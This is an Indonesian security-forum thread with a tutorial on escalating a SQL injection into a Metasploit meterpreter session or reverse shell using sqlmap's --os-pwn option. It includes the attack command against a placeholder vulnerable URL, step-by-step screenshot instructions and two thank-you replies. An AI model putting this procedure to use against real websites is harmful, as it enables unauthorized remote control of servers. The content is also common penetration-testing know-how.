NEW CONTENT RANDOM THREAD Unread Post

Mendapatkan Meterpreter Session Dengan SQLmap

by yuyudhn - 03-10-2016 at 10:52 PM
yuyudhn
root@linuxsec:-#
Posts:
9
Joined:
Mar 2016
Likes:
1
Reputation:
0
2 Year Of Member
#1
OP
Posted: 03-10-2016, 10:52 PM
Kali ini saya akan share trik yang mungkin kalian belum tau. Sebenarnya SQLmap sendiri sangat powerfull karena selain memudahkan untuk melakukan injeksi otomatis, banyak fitur lain seperti spawn shell via sqlmap, spawn sql-shell via sqlmap, dan kali ini yang akan saya bahas adalah spawn metasploit meterpreter session dengan sqlmap.
Cara ini pernah saya gunakan saat melakukan eksploitasi kiptrix level 4, meskipun akhir nya gagal dilanjutkan karena tidak bisa melakukan rooting dengan localroot.
Oke langsung saja ke tutorial.
  • Cara ini bisa dilakukan jika kalian mengetahui direktori writable dari target, bisa dilihat di error page nya.

  • Cara ini harus dilakukan dengan menggunakan hak akses root di sqlmap. Karena kita membutuhkan hak akses itu saat membuat payload.
jack@linuxsec:-$ sudo sqlmap -u http://urlsitusyangvuln.com?vuln.php?id=1337 --os-pwn
[img=320x0]https://2.bp.blogspot.com/-D4acSVkV_Xk/VuH3eZYmPDI/AAAAAAAADvI/ah3aLnkC7rskuhUgXwSlPfxDKhrqVE7Tw/s320/meterpreter-sqlmap.png[/img]

Selanjutnya pilih bahasa pemrograman apa yang digunakan di web tersebut.
[img=320x0]https://2.bp.blogspot.com/-vSciSx1FPik/VuH3u3FH3YI/AAAAAAAADvM/uDUbMIaopYI5Pe6K2Eq97Ah1zNQ20hp1w/s320/meterpreter-sqlmap2.png[/img]
Seperti yang saya bilang sebelumnya kalian harus tau drektori writable dari target.
Atau kalian juga bisa memilih opsi bruteforce jika belum tau.
[img=320x0]https://3.bp.blogspot.com/-AH1SwVHo4qg/VuH39XZCyRI/AAAAAAAADvQ/K8tYlCedqw0Gj36j7nmMK5REOGQ2qPaWw/s320/meterpreter-sqlmap3.png[/img]
Karena kita ingin menggunakan local os kita sebagai listener meterpreter nya, kita pilih opsi yang pertama.
[img=320x0]https://1.bp.blogspot.com/-yPADPg4A_Hs/VuH4RYX96_I/AAAAAAAADvU/OT_ZShkTdRQb6fMmCbxh4SZi4ey02EMmA/s320/meterpreter-sqlmap4.png[/img]
Untuk yang ini kalian bebas memilih spawn shell atau meterpreter session. Kalau memilih shell kalian akan memanggil bash shell / cmd nya.
[img=320x0]https://4.bp.blogspot.com/-GPzIJR6Nilk/VuH4f5uhs3I/AAAAAAAADvc/x1ZmRfn3u6U-CC7mFDiw66oyXEx9SdFAg/s320/mepterpreter-sqlmap5.png[/img]
Untuk arsitektur pilih yang 32bit saja karena ini bisa jalan juga di 64bit.
[img=320x0]https://1.bp.blogspot.com/-dKOR793z7eA/VuH45R9D9BI/AAAAAAAADvk/V6oyVj1sfn4G-tq6YNnn9hvb1_yA27pgQ/s320/meterpreter-sqlmap6.png[/img]
Tunggu terminal memanggil metasploit kita, dan welcome to meterpreter..
[img=320x0]https://4.bp.blogspot.com/-aELr24E6n2o/VuH5Imx1mfI/AAAAAAAADvo/o9Gsle7hy2EU-6-BABDOy-wU12babjkdg/s320/done-linuxsec.png[/img]


Sekian tutorial kali ini, semoga bermanfaat , share juga ke teman teman mu biar mereka tau.
source
Message
Reply
Find Posts
Peluru Kertas
Pengembara
Posts:
3
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#2
Posted: 12-27-2016, 05:24 PM
Mantapp mhanxxx !!! :v bisa gini juga sqlmap :'v
Message
Reply
Find Posts
A4Z1M4H
Junior Member
Posts:
1
Joined:
Dec 2016
Likes:
0
Reputation:
0
2 Year Of Member
#3
Posted: 12-28-2016, 03:33 PM
mantap broh thanks ilmunya
Message
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
1 Guest(s)
Navigation
Latest News
Bugtracker
Team
Mark forum as read
Community
Banlist
Usergroups
Memberlist
Statistics
Help/Account
Help Documents and Rules
Contact
Login
Create an account
About Us
Forum Backbox Indonesia adalah salah satu media pembelajaran bagi siapa saja yang ingin belajar mengenai dunia Open Source khususnya untuk memperdalam Backbox Linux.
Posts:
971
Members:
1322
Threads:
199
Resources:
0
New :
spongebob